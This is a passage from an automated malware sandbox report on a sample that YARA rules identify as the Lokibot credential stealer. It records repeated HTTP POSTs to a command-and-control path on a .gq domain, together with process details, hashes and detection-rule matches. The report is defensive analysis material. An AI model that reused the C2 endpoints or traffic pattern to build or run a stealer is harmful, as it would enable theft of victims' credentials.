                      Date: Thu, 14 Oct 2021 06:29:58 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pVTqfGYZG6lbiEUhHSdVmZCauemUr0Y%2BDwMOl8jQ0ldqgtA9xITilJs5vYZLZNEyT9OJN5kbjp%2BHOE4k2qqoAIe1jVhjQmKAUvsYFRYqMSmsNtQoFZ6LNXkpPSpmxGfDzqZFj4XqecgblbCCY5cS5zLZfkAuhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec19dfc3bdfcb-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      66192.168.2.649925172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:59.226830959 CEST7930OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:59.347254038 CEST7932INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:59 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gkjqA8qOHfmIDF%2B8y6qiYNfi%2BvKCn%2B9wfdd4HCP%2BYK0cnk28ajujXQRfcV4yPhPUB7cMD%2BZEx7KfsoCvsEDx9F1mGzxm8QL25QRC9D1NyirQW8VbFsNKnqSicUuJ0ck1LD6iO4oBLd%2BuJGOeJcZ4Ij1Vwl5I4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1a53d361f21-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      67192.168.2.649926104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:30:00.311328888 CEST7932OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:30:00.468617916 CEST7933INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:30:00 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iotQdWvLirTujDm5gcFSZO5hAVcZRC711g1iSDRI0%2Brb3822z%2BZAkRmuSDHdic5Uj57iNRI9xX3TN9YhS73pU0g3Awy8opYScVWOMDtQ3fUBF1pTWEZk13UdVN58f%2F5cQx2fm8PSSX%2BiO3wOmcduLTFZflpDzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1abfe1005b3-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      68192.168.2.649927104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:30:01.416466951 CEST7935OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:30:01.529956102 CEST7936INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:30:01 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CiMowfP3p1ILABVXu8os0ZvSOz0H05YMNivh25CZUCDEqQaAY7dMsK8WCuL55RhExNK%2Bo6QnXW2OoiY91LV4aaKszjnsVP1HpaPN5F1rSwA%2BPDZXqH2LcFbJP9o0ixVca8u%2FnOqGjaVHkzJnEmiYU0ivx8ExBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1b2eb3f1f2d-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      69192.168.2.649928104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:30:02.546683073 CEST7937OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:30:02.660093069 CEST7938INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:30:02 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ga%2FiBjWS7EnclaPLKo1yPnxw%2BS5FfTFKHZyEfv8SBx7PLc2z9qVP39s4Ou2jxC%2Fu692YAeRobnrXUUs%2FH5lz44oFoe0MdOk11UK7d0oa85kJs8BzBG9Wn1TN%2BaAxNOIaqjCVMknge%2BA0NpNTHFqXMCVwFECLVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1b9fcbb4a6d-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      7192.168.2.649786172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:27.340971947 CEST1068OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:27.495248079 CEST1069INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:27 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OvCReYL5kOGzCHk1X2inrDg3LE1il6%2B7FTgD%2FXIswLKX9fCBRgXz9DRTR%2BULHUkhSfhznG6alUky58mQbc1ir%2ByqnxuDkYKD854tu9UOoiYexIWXj8lJVJPVQ2nEQja6fVQg5wAHAZeKEplbfNmZMMqLBlJM6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf66ec32692b-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      70192.168.2.649929172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:30:03.716522932 CEST7939OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:30:03.830050945 CEST7940INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:30:03 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lYEXv8S4QiPBTpXu0rf5bJXcJoQvbh8c7zrS9vvc7tBBFtqt%2FvJ59pUThsIsz8qJpgBGda1LHR3Qb02pkkKRC8u7P6%2BBRoVadCg8Od0Z6UP29X6bSAT1Hn6xm8BlysHdhvQ59Xz1U2tY28nHS%2BqgJgDxQY4HdA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1c14c3ad6f5-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      71192.168.2.649930172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:30:04.877321005 CEST7941OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:30:04.995676041 CEST7942INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:30:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yauK70pfnNL%2FJ90goDaRLF0fpdY6QkzTDmTkMnqaOy%2Bzsu%2BpC4W1kWkeLla6LwdlVBR9OMv4e4x9fXwxwON1%2FUNUz5VC3UtbTzqe0Ta8KCEmGddTn%2FYX5GbiYSC%2B8T4y3Jh3h%2FGtVWT8LEgia0f88sVfgxwueQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1c88f4e3258-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      72192.168.2.649931172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:30:05.956295967 CEST7943OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:30:06.071351051 CEST7944INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:30:06 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FqfohRhEiuDGtoufJZoPIftug9rZXOY0iplMIhBxlnIZUjBXtab%2FI2jNrquCvC6cysFzwjayYPJM%2BQ8Xe4Icd2EQlB4ETqyyfmXIN7wgx7vriAXvx8gP%2BAmVX2ww%2FgOFnLGPHUENBicNBv5tAeMhrHNfgSR2tA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1cf4b1f63a7-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      73192.168.2.649932172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:30:07.140644073 CEST7945OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      74192.168.2.649933104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      75192.168.2.649934172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      76192.168.2.649935104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      77192.168.2.649936172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      78192.168.2.649937104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      79192.168.2.649938172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      8192.168.2.649787172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:30.289741993 CEST1070OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:30.451376915 CEST1071INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:30 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0Hk46wdoG1U27nz707h6QtW1GUw2h6o9OisNkyhB2aYUTsS7ahwfcM37s0X%2BXm8zCJMTqINkuUnoOUc6RiTwkeUHqopnJbQ82UpWA9CyU9N%2BqKVbZ2JX9RAD3Z5d9c3nY2pdXuQ2K39C%2BMU9nFo%2Bj20Dqe22SQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf795ca042e1-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      80192.168.2.649939172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      9192.168.2.649788172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:31.397798061 CEST1072OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:31.565464973 CEST1073INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:31 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xk4891DLaBXXjT1FhSY5vGjPMlx7%2FPwKsYbmlt3n3G5MwqOiF37%2FMqhNAZ9k%2FwEIMsJstsiC5k0UvsMw0imxbeYrZlZTQ1lGsg9Eox%2BRhZh7Mbe51awkrb53qeX5Jtjag4OXYQUnQ2SLmWUAhH7J7El0v%2F1uGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf804c5d4eb0-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Code Manipulations

                      Statistics

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Start time:08:28:10
                      Start date:14/10/2021
                      Path:C:\Users\user\Desktop\aZOmps0Ug8.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\user\Desktop\aZOmps0Ug8.exe'
                      Imagebase:0x400000
                      File size:283552 bytes
                      MD5 hash:70D177ABC7455C709AE9710630B9EA49
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, Author: kevoreilly
                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:low

                      General

                      Start time:08:28:12
                      Start date:14/10/2021
                      Path:C:\Users\user\Desktop\aZOmps0Ug8.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\user\Desktop\aZOmps0Ug8.exe'
                      Imagebase:0x400000
                      File size:283552 bytes
                      MD5 hash:70D177ABC7455C709AE9710630B9EA49
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:low

                      Disassembly

                      Code Analysis

                      Reset < >